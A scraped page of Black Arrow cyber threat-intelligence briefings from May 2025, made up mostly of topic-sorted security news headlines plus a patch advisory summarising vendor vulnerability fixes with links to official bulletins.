Feds Charge 16 Russians Allegedly Tied to Botnets Used in Ransomware, Cyber Attacks, and Spying | WIRED

A Brief History of DanaBot, Longtime Ecrime Juggernaut Disrupted by Operation Endgame | Proofpoint US

U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cyber Crime Operation

Russian Threat Actor TAG-110 Goes Phishing in Tajikistan

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

SideWinder APT Caught Spying on India's Neighbor Govts.

Tools and Controls

You do a fire drill, so do a cyber attack drill

100+ Fake Chrome Extensions Found Hijacking Sessions, Stealing Credentials, Injecting Ads

Data-stealing Chrome extensions impersonate Fortinet, YouTube, VPNs

Finding the right balance between 'vibe coders' and security - IT Security Guru

Lessons from the M&S cyber attack: how brands can survive digital catastrophe | Creative Boom

NCSC Helps Firms Securely Dispose of IT Assets - Infosecurity Magazine

Modern authentication: Why OIDC and SAML are just the start - Security Boulevard

Threat intelligence is crucial but organisations struggle to use it

The hidden gaps in your asset inventory, and how to close them - Help Net Security

How to Develop & Communicate Metrics for CSIRPs

Warning! Malicious Chrome extensions found mimicking legit tools | PCWorld

What is Universal 2nd Factor (U2F)? | Definition from TechTarget

Identity Security Has an Automation Problem—And It's Bigger Than You Think

GitLab's AI Assistant Opened Devs to Code Theft

AI hallucinations and their risk to cyber security operations - Help Net Security

What good threat intelligence looks like in practice - Help Net Security

Other News

Cross-site scripting is now responsible for 40 percent of all web attacks -- here's what you need to know

SMBs remain easy pickings for cyber criminals - here’s why | TechRadar

From 60 to 4,000: NATO's Locked Shields Reflects Cyber Defence Growth - SecurityWeek

Cyber security: Lack of planning and outdated IT systems putting Scotland at risk

Cyber attacks are affecting UK consumer trust in online payments, according to new data | Retail Week

Are we dangling on the edge of a digital apocalypse given all of the high-profile attacks recently? | News and events | Loughborough University

Healthcare Cyber Attacks Intensify, Sector Now Prime Target - Infosecurity Magazine

Cyber attack threat keeps me awake at night, bank boss says - BBC News

How to safeguard your small business in the hybrid work era: 5 top cyber security solutions | ZDNET

UK 'extremely dependent' on the US for space security • The Register

Why shipping can’t wait for another cyber security crisis - Splash247

SolarPower Europe calls for tough cyber rules following Danish import probe – pv magazine International

German Cyber Agency Sounds Warning on Grid Vulnerabilities

UK Science Funding HQ hit by 5.4M cyber assaults as attacks increase 600%

Vulnerability Management

Russian APT Groups Intensify Attacks in Europe with Zero-Day Exploits - Infosecurity Magazine

Nation-state APTs ramp up attacks on Ukraine and the EU - Help Net Security

CVE Disruption Threatens Foundations of Defensive Security

Vulnerability Exploitation Probability Metric Proposed by NIST, CISA Researchers - SecurityWeek

NIST's LEV Equation to Rate Chances a Bug Was Exploited

Vulnerabilities

Same suspected Chinese spies again attacking Ivanti bugs • The Register

Ivanti RCE attacks 'ongoing,' exploitation hits clouds • The Register

NATO-Flagged Vulnerability Tops Latest VMware Security Patch Batch - SecurityWeek

Critical OpenPGP.js Vulnerability Allows Spoofing - SecurityWeek

GitLab, Atlassian Patch High-Severity Vulnerabilities - SecurityWeek

Unpatched Windows Server Flaw Threatens AD Users

Cisco Patches High-Severity DoS, Privilege Escalation Vulnerabilities - SecurityWeek

Mozilla fixed zero-days demonstrated at Pwn2Own Berlin 2025

Windows 10 emergency updates fix BitLocker recovery issues

Multiple pfSense Firewall Vulnerabilities Let Attackers Inject Malicious Codes

RCE Vulnerability Found in RomethemeKit For Elementor Plugin - Infosecurity Magazine

O2 UK patches bug leaking mobile user location from call metadata

Critical Zero-Days Found in Versa Networks SD-WAN/SASE Platform - Infosecurity Magazine

Advisory Update on Cyber Threat Activity Targeting Commvault’s SaaS Cloud Application (Metallic) | CISA

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 18/05/2025 Black Arrow Admin 18/05/2025

Black Arrow Cyber Threat Intelligence Briefing 16 May 2025

Black Arrow Cyber Threat Intelligence Briefing 16 May 2025:

-Thousands of UK Companies 'Could Have M&S-Style Hackers Waiting in Their Systems'

-North Korean IT Workers Are Being Exposed on a Massive Scale, Potentially Thousands of Businesses Infiltrated

-‘They Yanked Their Own Plug’: How Co-op Averted an Even Worse Cyber Attack

-UK Government Publishes New Software and Cyber Security Codes of Practice

-Ransomware and the Board’s Role: What You Need to Know

-73% of CISOs Admit Security Incidents Due to Unknown or Unmanaged Assets

-AI Is Making Phishing Emails Far More Convincing with Fewer Typos and Better Formatting: Here’s How to Stay Safe

-Ransomware Enters ‘Post-Trust Ecosystem’

-Sim-Swap Fraud Rises by 1,000%: Why You Should Use App-Based, not SMS-Based, Two-Factor Authentication

-Cyber Threats Outpace Global Readiness

-CISOs Must Speak Business to Earn Executive Trust

-Downing St Updating Secret Contingencies for Russia Cyber Attack, Report Claims

Executive Summary

There has been a continued rise in the sophistication and scale of social engineering threats, particularly phishing campaigns enhanced by generative AI. These attacks increasingly bypass traditional filters and exploit executive impersonation, with one malicious email now detected every 42 seconds. Simultaneously, criminal groups are embedding themselves within corporate environments for prolonged periods, enabled by ransomware-as-a-service and AI-driven deception. This underscores the need for continuous monitoring, behaviour-based threat detection, and stronger identity verification practices across organisations.

Meanwhile, the global cyber threat landscape is becoming more fragmented and unpredictable. Ransomware gangs are operating without clear allegiances, making extortion attempts more erratic and harder to trace. At the same time, state-aligned actors, including North Korean IT operatives, are covertly infiltrating Western businesses under fake identities, exploiting remote work trends to fund illicit national objectives. Despite growing investment, nearly three-quarters of CISOs admit incidents caused by unknown or unmanaged assets—highlighting the critical importance of full visibility across the digital estate.

We believe boards must move from passive oversight to active engagement. The UK’s new Cyber Governance Code of Practice reflects this shift, encouraging directors to treat cyber risk as integral to business resilience. As threats intensify, governance, testing, and strategic communication must become core pillars of cyber readiness.

Governance, Risk and Compliance

A third of enterprises have been breached despite increased cyber security investment | TechRadar

Why Every CISO Should Be Gunning For A Seat At The Board Table

The CIO Role Is Expanding -- And So Are the Risks of Getting It Wrong

Fostering Resilience in Cybersecurity: Prevent Burnout and Enhance Sec Ops | MSSP Alert

Ransomware and the Board’s Role: What You Need to Know

Report: Cyber threats outpace global readiness | SC Media

CISOs must speak business to earn executive trust - Help Net Security

Author’s Q&A: It’s high time for CISOs to start leading strategically — or risk being scapegoated - Security Boulevard

Cyber cover needs to be a board conversation business chiefs warned

What is business resilience? | Definition from TechTarget

How to Successfully Evaluate IT Project Risk

Tackling threats and managing budgets in an age of AI - Tech Monitor

CIOs paying too much for not enough IT security - survey - TechCentral.ie

Infosec Layoffs Aren't the Bargain Boards May Think

Building Effective Security Programs Requires Strategy, Patience, and Clear Vision

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Enters ‘Post-Trust Ecosystem,’ NCA Cyber Expert Says - Infosecurity Magazine

UK retailers face 10% rises in premiums after cyber attacks

Ransomware and the Board’s Role: What You Need to Know

The ransomware landscape in 2025 | Kaspersky official blog

Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders

‘Aggressive’ hackers of UK retailers are now targeting US stores, says Google | Technology | The Guardian

Companies take an average of four months to report a ransomware attack

Thousands of UK companies 'could have M&S-style hackers waiting in their systems' | Science, Climate & Tech News | Sky News

Data Exfiltration is the New Ransomware in Evolving Cyber Landscape

How Interlock Ransomware Affects the Defense Industrial Base Supply Chain

Ransomware spreads faster, not smarter - Help Net Security

Ransomware attacks up over 120 percent in two years

BianLian and RansomExx Exploit SAP NetWeaver Flaw to Deploy PipeMagic Trojan

"Endemic" Ransomware Prompts NHS to Demand Supplier Action - Infosecurity Magazine

Inside the Ransomware Supply Chain: The Role of Initial Access Brokers in Modern Attacks | MSSP Alert

Threat hunting case study: Medusa ransomware | Intel 471

You think ransomware is bad? Wait until it infects CPUs • The Register

Beware — These Ransomware Hackers Are Watching You Work

Moldovan Police Arrest Suspect in €4.5M Ransomware Attack on Dutch Research Agency

Ransomware Victims

Marks and Spencer could face 12% drop in profits after cyber attacks

M&S to make £100m cyber claim from Allianz and Beazley

UK retailers face 10% rises in premiums after cyber attacks

‘Aggressive’ hackers of UK retailers are now targeting US stores, says Google | Technology | The Guardian

M&S Admit Customer Data Stolen in Cyber Incident | SC Media UK

Thousands of UK companies 'could have M&S-style hackers waiting in their systems' | Science, Climate & Tech News | Sky News

What we know about DragonForce ransomware • The Register

M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent

'They yanked their own plug': How Co-op averted an even worse cyber attack - BBC News

How Interlock Ransomware Affects the Defense Industrial Base Supply Chain

Coinbase Rejects $20M Ransom After Rogue Contractors Bribed to Leak Customer Data - SecurityWeek

Coinbase Targeted In $20 Million Extortion Plot Tied To Insider Data Leak - FinanceFeeds

Largest US steel manufacturer puts production on the backburner after cyber attack | TechRadar

Nova Scotia Power discloses data breach after March security incident

Security Firm Andy Frain Says 100,000 People Impacted by Ransomware Attack - SecurityWeek

Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine

Phishing & Email Based Attacks

AI is making phishing emails dangerously convincing with better spelling, grammar and formatting | TechRadar

New Phishing Attack Abusing Blob URLs to Bypass SEGs and Evade Analysis

Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders

Focused Phishing: Attack Targets Victims With Trusted Sites and Live Validation

This Microsoft 365 phishing campaign can bypass MFA - here's what we know | TechRadar

International cybercrime tackled: Amsterdam police and FBI dismantle proxy service Anyproxy – DataBreaches.Net

Email trap exposes 49K stockbroker customer records | Cybernews

Edinburgh schools targeted in cyber attack as pupils passwords reset - Edinburgh Live

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Despite drop in cyber claims, BEC keeps going strong - Help Net Security

Other Social Engineering

North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop

North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED

‘Hello pervert’: the sextortion scam claiming to have videoed you | Money | The Guardian

Hackers now testing ClickFix attacks against Linux targets

88% of Executives Had Home Floor Plans Available Online | Security Magazine

Fraud, Scams and Financial Crime

North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop

North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED

Fraud Losses Hit $11m Per Company as Customers Abuse Soars - Infosecurity Magazine

M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent

Sim-swap fraud rises by 1,000% as criminals seek to exploit growth of two-factor authentication | ITV News

4 times data breaches ramped up the UK's fraud risk - Which?

European Police Bust €3m Investment Fraud Ring - Infosecurity Magazine

‘Hello pervert’: the sextortion scam claiming to have videoed you | Money | The Guardian

Deepfake voices of senior US officials used in scams: FBI • The Register

Deepfake attacks could cost you more than money - Help Net Security

International Crime Rings Defraud US Gov't Out of Billions

Artificial Intelligence

AI is making phishing emails dangerously convincing with better spelling, grammar and formatting | TechRadar

Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders

Cisco: Majority of Businesses Unprepared for AI Cyberattacks

NCSC sounds warning over AI threat to critical national infrastructure | UKAuthority

In the AI age, excessive data accumulation is a cyber security threat - Nikkei Asia

Can Cyber Security Keep Up With the AI Arms Race?

AI-Powered DDoS Attacks Are Changing the Threat Landscape | IT Pro

Deepfake voices of senior US officials used in scams: FBI • The Register

Deepfake attacks could cost you more than money - Help Net Security

Why security teams cannot rely solely on AI guardrails - Help Net Security

Over Three Thousand macOS Cursor Users Compromised

Deepfake Defense in the Age of AI

AI vs AI: How cyber security pros can use criminals’ tools against them - Help Net Security

FTC wants a new, segregated software system to police deepfake porn | CyberScoop

Tackling threats and managing budgets in an age of AI - Tech Monitor

Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures

noyb sends Meta C&D demanding no EU user data AI training • The Register

How To Remove Meta AI From All Your WhatsApp Chats

2FA/MFA

This Microsoft 365 phishing campaign can bypass MFA - here's what we know | TechRadar

Malware

Malware landscape dominated by FakeUpdates | SC Media

Over Three Thousand macOS Cursor Users Compromised

Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures

Bots/Botnets

7,000-Device Proxy Botnet Using IoT, EoL Systems Dismantled in U.S. - Dutch Operation

Police dismantles botnet selling hacked routers as residential proxies

Three Russians, one Kazakhstani charged in takedown of Anyproxy and 5socks botnets | The Record from Recorded Future News

Mobile

M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent

Sim-swap fraud rises by 1,000% as criminals seek to exploit growth of two-factor authentication | ITV News

Denial of Service/DoS/DDoS

AI-Powered DDoS Attacks Are Changing the Threat Landscape | IT Pro

A cyber attack briefly disrupted South African Airways operations

Internet of Things – IoT

UK report uncovers serious security flaws in business IoT devices

Data Breaches/Leaks

Company and Personal Data Compromised in Recent Insight Partners Hack - SecurityWeek

Insight Partners fears secret financial info cyber-stolen • The Register

4 times data breaches ramped up the UK's fraud risk - Which?

Nova Scotia Power discloses data breach after March security incident

Ascension reveals personal data of 437,329 patients exposed in cyberattack

Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine

Hackers hit deportation airline GlobalX, leak flight manifests, and leave an unsubtle message for "Donnie" Trump

Email trap exposes 49K stockbroker customer records | Cybernews

Fashion giant Dior discloses cyberattack, warns of data breach

Australian Human Rights Commission Discloses Data Breach - SecurityWeek

160,000 Impacted by Valsoft Data Breach - SecurityWeek

Organised Crime & Criminal Actors

Who needs VC funding? How cybercriminals spread their ill-gotten gains to everyday business ventures | CyberScoop

Global Cyber Alliance Launches Internet Pollution Index to Combat Malicious Online Activity Around the World

How Security Has Changed the Hacker Marketplace

NatWest facing 100 million cyber attacks each month as experts reveal ‘staggering’ scale... - LBC

Kosovo authorities extradited admin of the cybercrime marketplace BlackDB.cc

Andrei Tarasov: Inside the Journey of a Russian Hacker on the FBI’s Most Wanted List - SecurityWeek

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Germany Shuts Down eXch Over $1.9B Laundering, Seizes €34M in Crypto and 8TB of Data

Coinbase data breach exposes customer info and government IDs

Coinbase Rejects $20M Ransom After Rogue Contractors Bribed to Leak Customer Data - SecurityWeek

Telegram shuts ‘largest darknet marketplace to have ever existed’

Insider Risk and Insider Threats

North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop

North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED

Layoffs pose a cybersecurity risk: Here's why offboarding matters - Help Net Security

Insider risk management needs a human strategy - Help Net Security

How working in a stressful environment affects cybersecurity - Help Net Security

Insurance

M&S to make £100m cyber claim from Allianz and Beazley

UK retailers face 10% rises in premiums after cyber attacks

Despite drop in cyber claims, BEC keeps going strong - Help Net Security

Cyber cover needs to be a board conversation business chiefs warned

Supply Chain and Third Parties

How Interlock Ransomware Affects the Defense Industrial Base Supply Chain

"Endemic" Ransomware Prompts NHS to Demand Supplier Action - Infosecurity Magazine

Earth Ammit Disrupts Drone Supply Chains Through Coordinated Multi-Wave Attacks in Taiwan | Trend Micro (US)

Cloud/SaaS

Microsoft Listens to Security Concerns and Delays New OneDrive Sync - Security Boulevard

Microsoft Teams will soon block screen capture during meetings

Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine

Identity and Access Management

The Persistence Problem: Why Exposed Credentials Remain Unfixed—and How to Change That

Linux and Open Source

New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine

Hackers now testing ClickFix attacks against Linux targets

Passwords, Credential Stuffing & Brute Force Attacks

The Persistence Problem: Why Exposed Credentials Remain Unfixed—and How to Change That

Social Media

Well, Well, Well: Meta to Add Facial Recognition To Glasses After All

Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures

noyb sends Meta C&D demanding no EU user data AI training • The Register

Regulations, Fines and Legislation

Google Pays $1.375 Billion to Texas Over Unauthorized Tracking and Biometric Data Collection

Why we must reform the Computer Misuse Act: A cyber pro speaks out | Computer Weekly

EU extends cyber sanctions regime amid rising digital threats - EU Reporter

UK Government Publishes New Software and Cyber Security Codes of Practice

NCSC assures CISA relationship unchanged post-Trump • The Register

DHS won’t tell Congress how many people it’s cut from CISA | CyberScoop

10 Reasons Why America Needs a Cyber Force

New cyber security law updates may be on the way

President Trump's Qatari 747 is a flying security disaster • The Register

CISA Reverses Decision on Cyber Security Advisory Changes - Infosecurity Magazine

Update to How CISA Shares Cyber-Related Alerts and Notifications | CISA

US Army Deactivates Only Active-Duty Information Operations Command

New EU vulnerability database will complement CVE program, not compete with it, says ENISA | CSO Online

What Does EU's Bug Database Mean for Vulnerability Tracking?

CVE funding crisis offers chance for vulnerability remediation rethink | CSO Online

Models, Frameworks and Standards

UN Launches New Cyber-Attack Assessment Framework - Infosecurity Magazine

UK Government Publishes New Software and Cyber Security Codes of Practice

New Cyber Security Certification for Defence Announced

NCSC and industry at odds over how to tackle shoddy software • The Register

Data Protection

noyb sends Meta C&D demanding no EU user data AI training • The Register

Careers, Working in Cyber and Information Security

Most businesses can't fill cyber roles leaving huge gaps in defense | TechRadar

Linux Foundation debuts Cybersecurity Skills Framework to address enterprise talent gaps - SiliconANGLE

Cyber Security Skills Framework connects the dots between IT job roles and the practical skills needed - Help Net Security

Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe – Krebs on Security

EU Launches Free Entry-Level Cyber Training Program - Infosecurity Magazine

Infosec Layoffs Aren't the Bargain Boards May Think

Law Enforcement Action and Take Downs

Police dismantles botnet selling hacked routers as residential proxies

Three Russians, one Kazakhstani charged in takedown of Anyproxy and 5socks botnets | The Record from Recorded Future News

Germany Shuts Down eXch Over $1.9B Laundering, Seizes €34M in Crypto and 8TB of Data

European Police Bust €3m Investment Fraud Ring - Infosecurity Magazine

Kosovo authorities extradited admin of the cybercrime marketplace BlackDB.cc

Moldovan Police Arrest Suspect in €4.5M Ransomware Attack on Dutch Research Agency

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace

Nation State Actors

CyberUK 2025: Resilience and APT Threats Loom Large

China

Chinese hackers behind attacks targeting SAP NetWeaver servers

Can Cybersecurity Keep Up With the AI Arms Race?

Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace

‘Rogue’ devices found in Chinese solar inverters - PV Tech

Earth Ammit Disrupts Drone Supply Chains Through Coordinated Multi-Wave Attacks in Taiwan | Trend Micro (US)

Ghost in the machine? Rogue communication devices found in Chinese inverters | Reuters

Russia

Downing St updating secret contingencies for Russia cyberattack, report claims – PublicTechnology

Russia-linked hackers target webmail servers in Ukraine-related espionage operation - Help Net Security

Fancy Bear campaign sought emails of high-level Ukrainians and their military suppliers | CyberScoop

Andrei Tarasov: Inside the Journey of a Russian Hacker on the FBI’s Most Wanted List - SecurityWeek

Attack claimed by pro-Ukraine hackers reportedly erases a third of Russian court case archive | The Record from Recorded Future News

North Korea

North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop

North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED

North Korea ramps up cyberspying in Ukraine to assess war risk

Tools and Controls

CyberUK 2025: Resilience and APT Threats Loom Large

Majority of Browser Extensions Pose Critical Security Risk, A New Report Reveals

DMARC’s Future: Ignoring Email Authentication is No Longer an Option - Security Boulevard

73% of CISOs admit security incidents due to unknown or unmanaged assets | CSO Online

Layoffs pose a cybersecurity risk: Here's why offboarding matters - Help Net Security

The browser blind spot: Hidden security risks behind employee web activity - Digital Journal

UK Government Publishes New Software and Cyber Security Codes of Practice

When the Perimeter Fails: Microsegmentation as the Last Line of Defense - Security Boulevard

Cyber cover needs to be a board conversation business chiefs warned

CIOs paying too much for not enough IT security - survey - TechCentral.ie

Cyber Security’s Early Warning System: How Live Network Traffic Analysis Detects The ‘Shock Wave’ Before the Breach ‘Tsunami’ - Security Boulevard

New UK Security Guidelines Aims to Reshape Software Development

NCSC and industry at odds over how to tackle shoddy software • The Register

Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace

Government webmail hacked via XSS bugs in global spy campaign

88% of Executives Had Home Floor Plans Available Online | Security Magazine

Why Red Teaming belongs on the C-suite agenda | TechRadar

Pen Testing for Compliance Only? It's Time to Change Your Approach

Tackling threats and managing budgets in an age of AI - Tech Monitor

Building Effective Security Programs Requires Strategy, Patience, and Clear Vision

Other News

A third of enterprises have been breached despite increased cybersecurity investment | TechRadar

Unsophisticated Hackers A Critical Threat, US Government Warns

Will cyber criminals come for accountants next? | AccountingWEB

Critical Infrastructure Siege: OT Security Still Lags

UK report uncovers serious security flaws in business IoT devices

Italy’s G7 drive for unified cyber resilience - Decode39

UK Government cyber 'battlements are crumbling' | Professional Security Magazine

Bluetooth 6.1 released, enhances privacy and power efficiency - Help Net Security

Spain to vet power plants’ cyber security for ‘great blackout’ cause | CSO Online

Departments have underestimated threat posed by cyber attacks, MPs warn

TikTok vs defence: Europe faces a reckoning over the allocation of energy

EU power grid needs trillion-dollar upgrade to avert Spain-style blackouts | Reuters

Students to be offered cyber crime protection training | The Herald

The Vatican’s cyber crusaders – POLITICO

Southwest Airlines CISO on tackling cyber risks in the aviation industry - Help Net Security

Vulnerability Management

SonicWall customers confront resurgence of actively exploited vulnerabilities | CyberScoop

Beyond Vulnerability Management – Can You CVE What I CVE?

Your old router could be a security threat - here's why and what to do | ZDNET

ISO - Configuration management: Why it’s so important for IT security

Malware landscape dominated by FakeUpdates | SC Media

DHS won’t tell Congress how many people it’s cut from CISA | CyberScoop

CISA Reverses Decision on Cybersecurity Advisory Changes - Infosecurity Magazine

EU launches own vulnerability database in wake of CVE funding issues | Cybernews

New EU vulnerability database will complement CVE program, not compete with it, says ENISA | CSO Online

Why CVSS is failing us and what we can do about it • The Register

New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine

CVE funding crisis offers chance for vulnerability remediation rethink | CSO Online

EU bug database fully operational as US slashes infosec • The Register

CVE funding crisis offers chance for vulnerability remediation rethink | CSO Online

Vulnerabilities

Microsoft Fixes 78 Flaws, 5 Zero-Days Exploited; CVSS 10 Bug Impacts Azure DevOps Server

SonicWall Under Pressure as Security Flaws Resurface | MSSP Alert

Your old router could be a security threat - here's why and what to do | ZDNET

Adobe Patches Big Batch of Critical-Severity Software Flaws - SecurityWeek

Fortinet Patches CVE-2025-32756 Zero-Day RCE Flaw Exploited in FortiVoice Systems

Critical Vulnerabilities in Mitel SIP Phones Let Attackers Inject Malicious Commands

Apple Patches Major Security Flaws in iOS, macOS Platforms - SecurityWeek

Compromised SAP NetWeaver instances are ushering in opportunistic threat actors - Help Net Security

Broadcom urges patching VMware Tools vulnerability | Cybernews

Ivanti warns of critical Neurons for ITSM auth bypass flaw

Ivanti Patches Two EPMM Zero-Days Exploited to Hack Customers - SecurityWeek

BianLian and RansomExx Exploit SAP NetWeaver Flaw to Deploy PipeMagic Trojan

New Chrome Vulnerability Enables Cross-Origin Data Leak via Loader Referrer Policy

New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine

SAP cyberattack widens, drawing Salt Typhoon and Volt Typhoon comparisons | CyberScoop

Critical SAP NetWeaver Vuln Faces Barrage of Cyber Attacks

SAP patches second zero-day flaw exploited in recent attacks

Commvault Command Center patch incomplete: researcher • The Register

Chipmaker Patch Tuesday: Intel, AMD, Arm Respond to New CPU Attacks - SecurityWeek

CISA Warns of TeleMessage Vuln Despite Low CVSS Score

Flaw in Asus DriverHub makes utility vulnerable to remote code execution | Tom's Hardware

Samsung Patches CVE-2025-4632 Used to Deploy Mirai Botnet via MagicINFO 9 Exploit

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 15/05/2025 Black Arrow Admin 15/05/2025

Black Arrow Cyber Advisory 15 May 2025 – Microsoft, Adobe, Ivanti, Fortinet, ASUS, Apple, Broadcom, Juniper and Zoom Security Updates

Executive Summary

Black Arrow Cyber Advisory Warning Triangle

Microsoft's Patch Tuesday for May 2025 addressed 72 vulnerabilities across its product line, including five actively exploited zero-day vulnerabilities. Notably, critical remote code execution flaws were patched in Microsoft Office, Azure DevOps Server, and the Windows Common Log File System Driver.

Adobe released security updates to address 40 vulnerabilities across several products, including critical issues in Adobe Photoshop, Illustrator, and Bridge. These flaws could lead to arbitrary code execution if exploited.

*Updated to clarify that the two vulnerabilities, CVE-2025-4427 and CVE-2025-4428 relating to Ivanti Endpoint Manager (EPMM) are associated with open-source libraries utilised by EPMM.

Ivanti disclosed multiple vulnerabilities affecting several of its products, including a critical authentication bypass in Ivanti Neurons for ITSM (on-premises). A remote code execution vulnerability, and an authentication bypass vulnerability relating to two open-source libraries that are integrated into Ivanti Endpoint Manager Mobile (EPMM) were also disclosed. Ivanti has reported that the EPMM related vulnerabilities have been exploited in the wild, emphasising the importance of applying the latest patches that address these vulnerabilities to secure affected systems.

Fortinet addressed several vulnerabilities across its product suite, notably patching a zero-day remote code execution flaw (CVE-2025-32756) in FortiVoice systems that was actively exploited. Additional critical updates were released for FortiOS and FortiProxy. Administrators should prioritise these updates to protect against potential exploits.

ASUS issued patches for two critical vulnerabilities (CVE-2025-3462 and CVE-2025-3463) in its DriverHub utility. These flaws could allow attackers to execute arbitrary code via crafted HTTP requests or malicious .ini files. Users of ASUS DriverHub should update to the latest version to mitigate these risks.

Apple released comprehensive security updates across its platforms, addressing several vulnerabilities in iOS, iPadOS, macOS, watchOS, tvOS, and visionOS.

Broadcom released a security update for VMware Tools, addressing an insecure file handling vulnerability (CVE-2025-22247). This flaw could allow a malicious actor with non-administrative privileges on Windows and Linux guest VM to tamper with local files, potentially leading to unauthorised behaviours within the virtual environment.

Juniper announced fixes for nearly 90 bugs in third-party dependencies in Secure Analytics, the virtual appliance that collects security events from network devices, endpoints, and applications.

Zoom released seven advisories for nine security defects in Zoom Workplace Apps across desktop and mobile platforms. The most severe of the issues is CVE-2025-30663 (CVSS 8.8), a high-severity time-of-check time-of-use race condition that could allow a local, authenticated attacker to elevate their privileges.

What’s the risk to me or my business?

The actively exploited vulnerabilities across these platforms could allow attackers to compromise the confidentiality, integrity, and availability of affected systems and data. Unpatched systems are at heightened risk of exploitation, leading to potential data breaches, system disruptions, and unauthorised access.

What can I do?

Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.

Microsoft

Further details on specific updates within this Microsoft patch Tuesday can be found here:

https://msrc.microsoft.com/update-guide/releaseNote/2025-May

Adobe, Ivanti, Fortinet, ASUS, Apple, Broadcom, Juniper and Zoom

Further details of the vulnerabilities in affected Apple, Adobe, Fortinet and SAP:

https://helpx.adobe.com/security/security-bulletin.html

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?language=en_US&_gl=1*13fxvyv*_gcl_au*MzY1MzU5Mjk2LjE3NDcxNjYwNTg

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-on-premises-only-CVE-2025-22462?language=en_US&_gl=1*wdhxpi*_gcl_au*MzY1MzU5Mjk2LjE3NDcxNjYwNTg

https://fortiguard.fortinet.com/psirt

https://www.asus.com/content/asus-product-security-advisory/

https://support.apple.com/en-us/100100

https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25683

https://supportportal.juniper.net/s/article/On-Demand-JSA-Series-Multiple-vulnerabilities-resolved-in-Juniper-Secure-Analytics-in-7-5-0-UP11-IF03

https://www.zoom.com/en/trust/security-bulletin/

#threatadvisory #threatintelligence #cybersecurity

Threat Intelligence Blog

Black Arrow Cyber Threat Intelligence Briefing 22 August 2025

Executive Summary

Top Cyber Stories of the Last Week

85% of Organisations Approach Cyber Security Reactively

25% of Security Leaders Replaced After Ransomware Attack

Iranian Threat Actor Group ‘MuddyWater’ Targeting CFOs Worldwide

Canadian Financial Regulator Hacked, Exposing Personal Data from Member Organisations

‘Impersonation as a Service’ the Next Big Thing in Cybercrime

URL-Based Threats Become a Go-To Tactic for Cybercriminals

How Evolving Remote Access Trojans (RATs) Are Redefining Enterprise Security Threats

How GenAI Complacency is Becoming Cyber Security’s Silent Crisis

Fake Employees Pose Real Security Risks

AI Gives Ransomware Gangs a Deadly Upgrade

DORA: Six Months into a Resilience Revolution

